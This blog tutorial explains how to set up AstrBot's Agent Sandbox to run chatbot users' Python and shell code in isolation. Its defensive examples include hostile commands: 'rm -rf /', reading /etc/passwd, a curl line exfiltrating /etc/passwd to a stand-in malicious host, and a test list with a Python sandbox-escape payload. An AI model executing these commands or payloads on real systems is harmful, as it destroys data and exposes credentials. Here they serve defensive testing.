How to Use AstrBot's Agent Sandbox for Safe Code Execution

Mar 4, 2026

Problem

When I built an AI chatbot that could execute Python code, I quickly ran into a scary realization: what if a user asks the bot to run os.system('rm -rf /') or reads sensitive files like /etc/passwd?

I tried using Python’s built-in exec() function:

def run_user_code(code: str):
    try:
        exec(code)
    except Exception as e:
        print(f"Error: {e}")

# A user sends this through my chatbot
run_user_code("import os; os.system('cat /etc/passwd')")

This is obviously dangerous. The code runs with full privileges on my server.

Why Sandboxing Matters

The core problem with unrestricted code execution is attack surface. A malicious user could:

Read sensitive files (credentials, config files)
Delete critical data
Make unauthorized network requests
Consume all system resources (fork bombs, memory exhaustion)
Pivot to other parts of the infrastructure

Traditional solutions like RestrictedPython only provide partial protection. They can restrict some builtins and attributes, but determined attackers can often bypass these restrictions through various Python internals.

What I needed was true isolation - a separate environment where code runs with limited capabilities, and failures don’t affect the host system.

What is AstrBot’s Agent Sandbox?

AstrBot is an open-source chatbot framework that includes a built-in Agent Sandbox feature. The sandbox provides isolated Python and shell execution environments for AI agents.

The architecture looks like this:

┌─────────────────────────────────────────────────────────────┐
│                     User/LLM Request                         │
└─────────────────────────┬───────────────────────────────────┘
                          │
                          ▼
┌─────────────────────────────────────────────────────────────┐
│                  Security Policy Check                       │
│  ┌─────────────────────────────────────────────────────┐   │
│  │ - Module whitelist/blacklist                         │   │
│  │ - Command validation                                 │   │
│  │ - Resource limit enforcement                         │   │
│  └─────────────────────────────────────────────────────┘   │
└─────────────────────────┬───────────────────────────────────┘
                          │
                          ▼
┌─────────────────────────────────────────────────────────────┐
│                   Isolated Runtime                          │
│  ┌─────────────────────────────────────────────────────┐   │
│  │ - Separate process/container                         │   │
│  │ - Limited filesystem access                          │   │
│  │ - Network restrictions                               │   │
│  │ - Memory/CPU/time limits                             │   │
│  └─────────────────────────────────────────────────────┘   │
└─────────────────────────┬───────────────────────────────────┘
                          │
                          ▼
┌─────────────────────────────────────────────────────────────┐
│                    Output Filter                             │
│  ┌─────────────────────────────────────────────────────┐   │
│  │ - Sanitize results                                   │   │
│  │ - Redact sensitive information                       │   │
│  └─────────────────────────────────────────────────────┘   │
└─────────────────────────┬───────────────────────────────────┘
                          │
                          ▼
┌─────────────────────────────────────────────────────────────┐
│                     Safe Result                              │
└─────────────────────────────────────────────────────────────┘

Key capabilities:

Python execution: Run Python code with restricted module access
Shell execution: Execute shell commands with filtering
Session management: Maintain state across multiple code executions
Resource limits: Control memory, CPU, and execution time
Web ChatUI integration: Access sandbox through AstrBot’s web interface

Setting Up the Sandbox

Prerequisites

AstrBot installed (version 3.4.0 or later)
Python 3.8+
Docker (recommended for full isolation)

Installation

First, I cloned and installed AstrBot:

git clone https://github.com/Soulter/AstrBot.git
cd AstrBot
pip install -r requirements.txt

Enabling the Agent Sandbox

In the AstrBot configuration, I enabled the sandbox feature:

agent_sandbox:
  enabled: true
  backend: "docker"  # or "local" for process isolation
  security_policy:
    restricted_modules:
      - os
      - subprocess
      - socket
      - ctypes
      - sys
    memory_limit: "256m"
    cpu_limit: 1
    execution_timeout: 30
    network_access: "restricted"
    allowed_commands:
      - ls
      - cat
      - grep
      - python

The backend option determines the isolation level:

docker: Full container isolation (recommended)
local: Process-based isolation (lighter but less secure)

Executing Python Code Safely

Basic Code Execution

I created a simple plugin to execute user-provided Python code:

from astrbot.api.event import filter, AstrMessageEvent
from astrbot.api.star import Context, Star, register

@register("sandbox_executor", "author", "Safe code execution plugin", "1.0.0", "https://github.com/example")
class SandboxExecutorPlugin(Star):
    @filter.command("run")
    async def execute_code(self, event: AstrMessageEvent):
        # Extract code from message: /run print('hello')
        code = event.get_plain_text().replace("/run ", "")

        # Execute in sandbox
        result = await self.context.agent_sandbox.execute_python(code)

        if result.get("error"):
            yield event.plain_result(f"Error: {result['error']}")
        elif result.get("security_violations"):
            yield event.plain_result("Blocked: Security violation detected")
        else:
            yield event.plain_result(f"Output: {result['output']}")

When I tested with safe code:

User: /run print(2 + 2)
Bot: Output: 4

User: /run [x**2 for x in range(10)]
Bot: Output: [0, 1, 4, 9, 16, 25, 36, 49, 64, 81]

Handling Security Violations

When I tried to import restricted modules:

User: /run import os; os.system('whoami')
Bot: Blocked: Security violation detected

The sandbox detected the attempt to import os and blocked execution.

I also tested what happens with resource exhaustion attempts:

# This tries to consume all memory
x = []
while True:
    x.append(' ' * 1000000)

The sandbox killed the process after hitting the memory limit:

User: /run x = []\nwhile True:\n    x.append(' ' * 1000000)
Bot: Error: Memory limit exceeded (256MB)

Safe Shell Command Execution

The sandbox also supports shell command execution with filtering:

from astrbot.api.event import filter, AstrMessageEvent
from astrbot.api.star import Context, Star, register

@register("shell_executor", "author", "Shell command plugin", "1.0.0", "https://github.com/example")
class ShellExecutorPlugin(Star):
    @filter.command("shell")
    async def execute_shell(self, event: AstrMessageEvent):
        command = event.get_plain_text().replace("/shell ", "")

        # Execute shell command in sandbox
        result = await self.context.agent_sandbox.execute_shell(command)

        if result.get("blocked"):
            yield event.plain_result(f"Blocked: {result['reason']}")
        elif result.get("error"):
            yield event.plain_result(f"Error: {result['error']}")
        else:
            yield event.plain_result(f"Output:\n{result['output']}")

Testing with allowed commands:

User: /shell ls -la
Bot: Output:
total 8
drwxr-xr-x 2 root root 4096 Mar  3 10:00 .
drwxr-xr-x 3 root root 4096 Mar  3 10:00 ..

But dangerous commands get blocked:

User: /shell rm -rf /
Bot: Blocked: Command 'rm' not in allowed list

User: /shell curl http://malicious-site.com/exfil?data=$(cat /etc/passwd)
Bot: Blocked: Command 'curl' not in allowed list

Session-Level Resource Management

One powerful feature is session-based execution. This allows maintaining state across multiple code runs within a session.

Why Sessions Matter

Without sessions, each code execution starts fresh. But sometimes I need to:

Load a large dataset once, then query it multiple times
Train a model incrementally
Maintain variables across conversation turns

Using Sessions

from astrbot.api.event import filter, AstrMessageEvent
from astrbot.api.star import Context, Star, register

@register("session_executor", "author", "Session-based execution", "1.0.0", "https://github.com/example")
class SessionExecutorPlugin(Star):
    def __init__(self, context: Context):
        super().__init__(context)
        self.sessions = {}  # user_id -> session_id

    @filter.command("session_start")
    async def start_session(self, event: AstrMessageEvent):
        user_id = event.get_sender_id()

        # Create a new sandbox session
        session_id = await self.context.agent_sandbox.create_session(
            user_id=user_id,
            timeout=300,  # 5 minute session
            memory_limit="512m"
        )

        self.sessions[user_id] = session_id
        yield event.plain_result(f"Session started: {session_id[:8]}...")

    @filter.command("srun")
    async def execute_in_session(self, event: AstrMessageEvent):
        user_id = event.get_sender_id()
        session_id = self.sessions.get(user_id)

        if not session_id:
            yield event.plain_result("No active session. Use /session_start first.")
            return

        code = event.get_plain_text().replace("/srun ", "")

        # Execute in existing session (state persists)
        result = await self.context.agent_sandbox.execute_python(
            code,
            session_id=session_id
        )

        yield event.plain_result(f"Output: {result.get('output', result.get('error'))}")

    @filter.command("session_end")
    async def end_session(self, event: AstrMessageEvent):
        user_id = event.get_sender_id()
        session_id = self.sessions.pop(user_id, None)

        if session_id:
            await self.context.agent_sandbox.destroy_session(session_id)
            yield event.plain_result("Session ended and resources cleaned up.")
        else:
            yield event.plain_result("No active session to end.")

A practical example - loading and analyzing data:

User: /session_start
Bot: Session started: a1b2c3d4...

User: /srun import pandas as pd
Bot: Output: None

User: /srun df = pd.read_csv('data.csv')  # Pre-uploaded file
Bot: Output: None

User: /srun df.head()
Bot: Output:
   id  name  value
0   1   Alice    100
1   2     Bob    200
2   3 Charlie    150

User: /srun df['value'].mean()
Bot: Output: 150.0

User: /session_end
Bot: Session ended and resources cleaned up.

The session kept df in memory across multiple executions.

Session Lifecycle

The session lifecycle follows this pattern:

┌────────────────┐
│ Create Session │ ──→ Allocate resources, assign session_id
└───────┬────────┘
        │
        ▼
┌────────────────┐
│ Execute Code   │ ──→ Run in session context (state persists)
└───────┬────────┘
        │
        ▼
┌────────────────┐
│ Execute More   │ ──→ Previous variables/functions available
└───────┬────────┘
        │
        ▼
┌────────────────┐
│ Destroy Session│ ──→ Clean up memory, release resources
└────────────────┘

Sessions automatically expire after the configured timeout, preventing resource leaks from abandoned sessions.

Using the Sandbox via Web ChatUI

AstrBot includes a web interface that integrates with the sandbox. After starting AstrBot with the web plugin:

python main.py --web

The web interface is available at http://localhost:6185.

In the ChatUI, I can enable agent mode which allows the AI to execute code through the sandbox. When the AI needs to run calculations or process data, it automatically uses the sandbox.

The ChatUI shows:

Code being executed
Output or errors
Execution time
Resource usage

This is useful for:

Quick data analysis tasks
Mathematical computations
File processing workflows

Advanced Security Configuration

Custom Module Restrictions

I can fine-tune which modules are allowed:

agent_sandbox:
  security_policy:
    # Completely block these modules
    restricted_modules:
      - os
      - subprocess
      - socket
      - ctypes
      - sys
      - importlib
      - builtins

    # Allow specific functions from otherwise restricted modules
    module_overrides:
      os.path:
        allowed: true
        functions:
          - join
          - basename
          - dirname
          - exists

    # Whitelist approach (more secure but restrictive)
    mode: "whitelist"
    allowed_modules:
      - math
      - json
      - re
      - datetime
      - collections

Network Access Control

For use cases requiring network access (like web search):

agent_sandbox:
  security_policy:
    network_access: "restricted"
    allowed_domains:
      - "api.openai.com"
      - "search.example.com"
    # Block all other network requests

Resource Limits

Adjust limits based on expected workload:

agent_sandbox:
  security_policy:
    memory_limit: "512m"    # Per execution
    cpu_limit: 2            # Number of CPU cores
    execution_timeout: 60   # Seconds
    max_output_size: "10m"  # Limit output size
    max_file_size: "100m"   # Limit file operations

Best Practices

What I Learned the Hard Way

Start restrictive, then relax: Begin with a whitelist approach and add permissions as needed, rather than starting permissive and trying to tighten later.

Test with real attack patterns: I created a test suite with common attack vectors:

ATTACK_VECTORS = [
    "import os; os.system('id')",
    "__import__('subprocess').call(['cat', '/etc/passwd'])",
    "exec(open('/etc/passwd').read())",
    "().__class__.__bases__[0].__subclasses__()[137]('id', shell=True).communicate()",
]

Monitor resource usage: Even with limits, track CPU/memory trends to catch slow resource leaks.
Log everything: Security events, violations, and execution patterns help identify attack attempts.
Session cleanup is critical: Always implement session cleanup, especially for web applications where users might not explicitly end sessions.

Common Mistakes

Relying only on module restrictions: Advanced attackers can use Python’s introspection to access blocked functionality. Always use container/process isolation as the primary defense.
Ignoring timeout configuration: A complex computation might hang indefinitely without proper timeout settings.
Allowing too many shell commands: Each allowed command is potential attack surface. The allowed_commands list should be minimal.
Not handling errors gracefully: Exposing internal error messages can leak system information. Sanitize error output.

The Reason

The key insight is that secure code execution requires multiple layers of defense:

Container/process isolation prevents direct system access
Module restrictions limit what the code can import
Resource limits prevent denial-of-service attacks
Command filtering controls shell execution
Session management prevents resource leaks

No single layer is sufficient, but together they provide strong protection.

Summary

In this post, I showed how to use AstrBot’s Agent Sandbox for secure code execution. I covered setting up the sandbox, executing Python and shell commands safely, managing sessions for stateful execution, and configuring security policies.

The key point is that sandboxing AI-generated code requires defense in depth - isolation, restrictions, limits, and monitoring all working together. AstrBot’s built-in sandbox provides these layers out of the box, making it easier to build secure AI agents.

Final Words + More Resources

My intention with this article was to help others share my knowledge and experience. If you want to contact me, you can contact by email: Email me

Here are also the most important links from this article along with some further resources that will help you in this scope:

Oh, and if you found these resources useful, don’t forget to support me by starring the repo on GitHub!